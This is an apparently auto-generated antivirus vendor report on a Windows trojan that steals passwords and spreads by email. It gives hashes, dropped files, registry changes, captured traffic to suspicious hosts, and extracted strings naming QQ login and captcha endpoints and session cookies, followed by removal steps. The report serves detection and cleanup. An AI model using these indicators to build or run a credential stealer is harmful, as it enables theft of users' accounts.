Gen.Variant.Strictor.70570_5950e32034

by malwarelabrobot on November 10th, 2017 in Malware Descriptions.

Gen:Variant.Strictor.70570 (B) (Emsisoft), Gen:Variant.Strictor.70570 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 5950e32034e0e671f95897fd69de3771
SHA1: e6a484b330e484ca0ec9a579b896263903abc9eb
SHA256: 75540259097922816c4aa0062a4b9a0579c523c2d100dfa2b302a1793f0750e6
SSDeep: 24576:5V2r0IX 1G449/LLFdfRvIOyY/S7pI2etZTZaqdiXSp0c02uFG6dAk3CM6wNd:5Vc4O/nRvWe2CTZaqdwk0c05HGi6Y
Size: 2191360 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company:
Created at: 2017-10-17 05:35:07
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-PSW. Trojan program intended for stealing users' passwords.

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:1504

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\kjkjz1[1].htm (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110920171110\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\19059730[1].js (485 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ErrorPageTemplate[1] (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ssggd1[1].htm (109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\down[1] (748 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\background_gradient[1] (453 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\info_48[1] (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\qqkjz11[1].htm (813 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\qqkjz13[1].htm (503 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QUCWMMCQ.txt (231 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\bullet[1] (447 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\qqkjzgg1[1].htm (1310 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\gjgg[1].htm (5105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IE1IKUZH.txt (78 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3MKX82S2.txt (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\errorPageStrings[1] (2 bytes)
C:\dc.dll (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\httpErrorPagesScripts[1] (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\qqkjz12[1].htm (1273 bytes)
C:\SkinH_EL.dll (178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\mcgg[1].htm (75 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\dnserrordiagoff_webOC[1] (6 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3MKX82S2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101120171012\index.dat (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101120171012 (0 bytes)

Registry activity

The process %original file name%.exe:1504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"cFormatTags" = "2"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"aFormatTagCache" = "01 00 00 00 10 00 00 00 55 00 00 00 1E 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017110920171110]
"CachePrefix" = ":2017110920171110:"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017110920171110]
"CacheOptions" = "11"
"CacheLimit" = "8192"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"cFilterTags" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"fdwSupport" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017110920171110]
"CacheRepair" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\5950e32034e0e671f95897fd69de3771_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017110920171110]
"CachePath" = "%USERPROFILE%\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110920171110"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017101120171012]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
147127382e001f495d1842ee7a9e7912 c:\SkinH_EL.dll
f803ad370a8649a143429f179af5f3ab c:\dc.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ???????????????
Product Name: ???????????????
Product Version: 6.5.0.0
Legal Copyright: ???????????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 6.5.0.0
File Description: ???????????????
Comments: ???????????????
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 844211 847872 4.50889 6702361099ce861dadf503f48ef9a7fd
.rdata 851968 1219210 1220608 5.18538 6a482a891ee3304d67c47690662e2ce3
.data 2072576 315114 86016 3.61322 85c80b871250d8c29f8860c4d6b589f4
.rsrc 2387968 29708 32768 3.58238 2d3e1185a07acd41fe0f7b3f10ddede1


URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /19059730.js HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/qqkjz11.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Thu, 09 Nov 2017 02:17:32 GMT
Content-Type: application/javascript
Content-Length: 1859
Last-Modified: Fri, 03 Nov 2017 07:17:37 GMT
Connection: keep-alive
ETag: "59fc1811-743"
Accept-Ranges: bytes

GET /ad/ssggd1.htm HTTP/1.1
Referer: hXXp://123.51pc114.cn/ad/ssggd1.htm
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 123.51pc114.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 109
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/ssggd1.htm
Last-Modified: Fri, 06 Jan 2017 15:11:53 GMT
Accept-Ranges: bytes
ETag: "f231d0362f68d21:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: safedog-flow-item=; expires=Thur, 9-Nov-2017 15:59:26 GMT; domain=51pc114.cn; path=/
Date: Thu, 09 Nov 2017 02:17:26 GMT



GET /ad/qqkjz11.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive
Cookie: safedog-flow-item=


HTTP/1.1 200 OK
Content-Length: 813
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/qqkjz11.htm
Last-Modified: Mon, 16 Jan 2017 15:57:38 GMT
Accept-Ranges: bytes
ETag: "8613f6421170d21:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:26 GMT



GET /ad/mcgg.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive
Cookie: safedog-flow-item=


HTTP/1.1 200 OK
Content-Length: 75
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/mcgg.htm
Last-Modified: Thu, 28 Mar 2013 03:33:01 GMT
Accept-Ranges: bytes
ETag: "8222f3642bce1:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:26 GMT
<meta HTTP-EQUIV=REFRESH CONTENT="0;URL=hXXp://ad.7532.com/ad/mcgg456.htm">



GET /ad/qqkjzgg1.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive
Cookie: safedog-flow-item=


HTTP/1.1 200 OK
Content-Length: 3106
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/qqkjzgg1.htm
Last-Modified: Sun, 03 Sep 2017 09:19:28 GMT
Accept-Ranges: bytes
ETag: "ef72be9524d31:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:27 GMT

GET /ad/qqkjz13.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive
Cookie: safedog-flow-item=


HTTP/1.1 200 OK
Content-Length: 503
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/qqkjz13.htm
Last-Modified: Thu, 17 Dec 2015 13:49:22 GMT
Accept-Ranges: bytes
ETag: "6ca0e3bbd138d11:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:27 GMT

GET /ad/gjgg.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive
Cookie: safedog-flow-item=


HTTP/1.1 200 OK
Content-Length: 15198
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/gjgg.htm
Last-Modified: Tue, 21 Jun 2016 02:14:19 GMT
Accept-Ranges: bytes
ETag: "8228749e62cbd11:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:27 GMT

GET /ad/qqkjz12.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive
Cookie: safedog-flow-item=


HTTP/1.1 200 OK
Content-Length: 1273
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/qqkjz12.htm
Last-Modified: Fri, 09 Dec 2016 13:25:25 GMT
Accept-Ranges: bytes
ETag: "8efaa5b31f52d21:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:27 GMT

GET /setup/kjkjz1.htm HTTP/1.1
Referer: hXXp://123.51pc114.cn/setup/kjkjz1.htm
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 123.51pc114.cn
Cache-Control: no-cache
Cookie: safedog-flow-item=


HTTP/1.1 200 OK
Content-Length: 3
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/setup/kjkjz1.htm
Last-Modified: Tue, 17 Oct 2017 11:31:19 GMT
Accept-Ranges: bytes
ETag: "3c11b0733b47d31:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:27 GMT
6.5


GET /setup/a.html HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Host: ad.51pc114.cn


HTTP/1.1 200 OK
Content-Length: 45
Content-Type: text/html
Content-Location: hXXp://ad.51pc114.cn/setup/a.html
Last-Modified: Fri, 01 Aug 2014 03:58:28 GMT
Accept-Ranges: bytes
ETag: "3efdd9d93cadcf1:321"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: safedog-flow-item=; expires=Thur, 9-Nov-2017 15:59:18 GMT; domain=51pc114.cn; path=/
Date: Thu, 09 Nov 2017 02:17:18 GMT
[EhXXp://ad.51pc114.cn/setup/ex.html]..[n101]..


GET /go.asp?svid=9&id=19059730&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1276,846&referrer=&vpage=http://123.51pc114.cn/ad/qqkjz11.htm&vvtime=1510193852775 HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/qqkjz11.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: web.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 09 Nov 2017 02:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Expires: Wed, 08 Nov 2017 09:38:54 GMT
Cache-control: private


GET /fclose.php?id=152695 HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/qqkjz12.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: u291014.778669.com
Connection: Keep-Alive


HTTP/1.1 403 Forbidden
Server: nginx/1.0.11
Date: Thu, 09 Nov 2017 02:17:35 GMT
Content-Type: text/html; charset=gb2312
Content-Length: 571
Connection: keep-alive

GET /setup/ssxczgg2269.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: ad.51pc114.cn
Cache-Control: no-cache


HTTP/1.1 404 Not Found
Content-Length: 1308
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 09 Nov 2017 02:17:20 GMT

The Trojan connects to the servers at the following location(s):

%original file name%.exe_1504:

hXXp://s.plcloud.music.qq.com/fcgi-bin/fcg_order_singer_getnum.fcg?singermid=
hXXp://user.qzone.qq.com/p/g/fcg-bin/cgi_emotion_list.fcg?uin=
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: user.qzone.qq.com
Referer: hXXp://user.qzone.qq.com/
X-Real-Url: hXXp://g.qzone.qq.com/fcg-bin/cgi_emotion_list.fcg?uin=
hXXp://w.qzone.qq.com/cgi-bin/likes/internal_dolike_app?g_tk=
&zb_url=http://i.gtimg.cn/qzone/space_item/pre/1/1_1.gif
&curkey=http://user.qzone.qq.com/
&unikey=http://user.qzone.qq.com/
/?t=0.11051907816539691&appid=7030&face=0&fupdate=1&from=1&query_count=200&opuin=
qzreferrer=http://user.qzone.qq.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
hXXp://ad.51pc114.cn/setup/ssxczgg2269.txt
hXXp://VVV.7532.com/thread-145964-1-1.html
122.228.204.12
hXXp://blog.sina.com.cn/s/blog_81b5163c0102vw7z.html
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
hXXps://
hXXp://
hXXp://123.51pc114.cn/ad/ssggd1.htm
Adodb.Stream
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVFW32.dll
USER32.dll
51pc114.cn
123.51pc114.cn
hXXp://123.51pc114.cn/setup/kjkjz1.htm
Www.7532.com
hXXp://ad.51pc114.cn/setup/a.html
regsvr32 /s winhttp.dll
WinHttp
hXXp://123.51pc114.cn/setup/QQljz1.html
p_skey=;
airkey=;
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=https://qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url=https://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=
&pt_qr_link=https://z.qzone.com/download.html&self_regurl=https://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=https://z.qzone.com/download.html&pt_no_auth=0
pt_login_sig
hXXps://ssl.ptlogin2.qq.com/check?pt_tea=2&uin=
hXXps://ssl.captcha.qq.com/cap_union_prehandle?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&uid=
hXXps://ssl.captcha.qq.com/cap_union_new_show?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=
websig:"
.*?="({.*?})"
hXXps://ssl.captcha.qq.com/cap_union_new_getcapbysig?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&sess=
Pfunction time(){return Math.random()}
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
&websig=
aid=549000912&captype=&protocol=https&clientype=1&disturblevel=&apptype=2&noheader=0&uid=
hXXps://ssl.captcha.qq.com/cap_union_new_verify?random=
&js_ver=10225&js_type=1&login_sig=
&pt_randsalt=2&pt_jstoken=3116114273&u1=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=3-5-
hXXps://ssl.ptlogin2.qq.com/login?u=
hXXp://user.qzone.qq.com/
function time(){return new Date().getTime()}
skey

%original file name%.exe_1504_rwx_10001000_00039000:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\kjkjz1[1].htm (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110920171110\index.dat (16 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\19059730[1].js (485 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ErrorPageTemplate[1] (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ssggd1[1].htm (109 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\down[1] (748 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\background_gradient[1] (453 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\info_48[1] (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\qqkjz11[1].htm (813 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\qqkjz13[1].htm (503 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QUCWMMCQ.txt (231 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\bullet[1] (447 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\qqkjzgg1[1].htm (1310 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\gjgg[1].htm (5105 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IE1IKUZH.txt (78 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3MKX82S2.txt (77 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\errorPageStrings[1] (2 bytes)
    C:\dc.dll (122 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\httpErrorPagesScripts[1] (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\qqkjz12[1].htm (1273 bytes)
    C:\SkinH_EL.dll (178 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\mcgg[1].htm (75 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\dnserrordiagoff_webOC[1] (6 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
